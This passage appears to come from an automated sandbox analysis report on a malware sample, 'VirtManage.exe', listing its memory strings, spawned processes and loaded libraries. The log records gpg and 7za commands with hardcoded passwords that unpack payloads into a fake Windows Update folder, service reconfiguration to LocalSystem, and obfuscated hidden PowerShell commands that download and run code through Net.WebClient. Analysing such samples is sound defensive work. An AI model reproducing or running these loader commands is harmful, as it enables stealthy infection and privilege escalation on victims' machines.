Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.912308379.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table if not exists ultimately_trusted_keys (keyid);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table version (version INTEGER);error initializing TOFU database: %s
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select version from version;
Source: gpg.exe, gpg.exe, 00000003.00000002.917669988.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.923429253.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.979415910.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000011.00000002.1006958362.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: create table signatures (binding INTEGER NOT NULL, sig_digest TEXT, origin TEXT, sig_time INTEGER, time INTEGER, primary key (binding, sig_digest, origin));
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = %d, conflict = %Q where email = %Q and fingerprint = %Q and effective_policy != %d;
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: select count(*) from sqlite_master where type='table';error reading TOFU database: %s
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: update bindings set effective_policy = ? where fingerprint = ?;
Source: gpg.exeString found in binary or memory: full-help
Source: gpg.exeString found in binary or memory: i386/mpih-add1.S:i386/mpih-sub1.S:i386/mpih-mul1.S:i386/mpih-mul2.S:i386/mpih-mul3.S:i386/mpih-lshift.S:i386/mpih-rshift.S
Source: gpg.exeString found in binary or memory: full-help
Source: C:\Users\user\Desktop\VirtManage.exe | File read: C:\Users\user\Desktop\VirtManage.exe
Source: unknown | Process created: C:\Users\user\Desktop\VirtManage.exe "C:\Users\user\Desktop\VirtManage.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi"
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FB5755C4D12C2C80E27834E9FC6EF971 C
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Windows\SysWOW64\w32tm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\w32tm.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe "C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: explorerframe.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libassuan-9.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgcrypt-20.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libnpth-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libsqlite3-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: zlib1.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libassuan-9.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgcrypt-20.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libnpth-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libsqlite3-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: zlib1.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libassuan-9.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgcrypt-20.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libnpth-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libsqlite3-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: zlib1.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: libgpg-error-0.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe | Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptnet.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: usp10.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msls31.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dispex.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
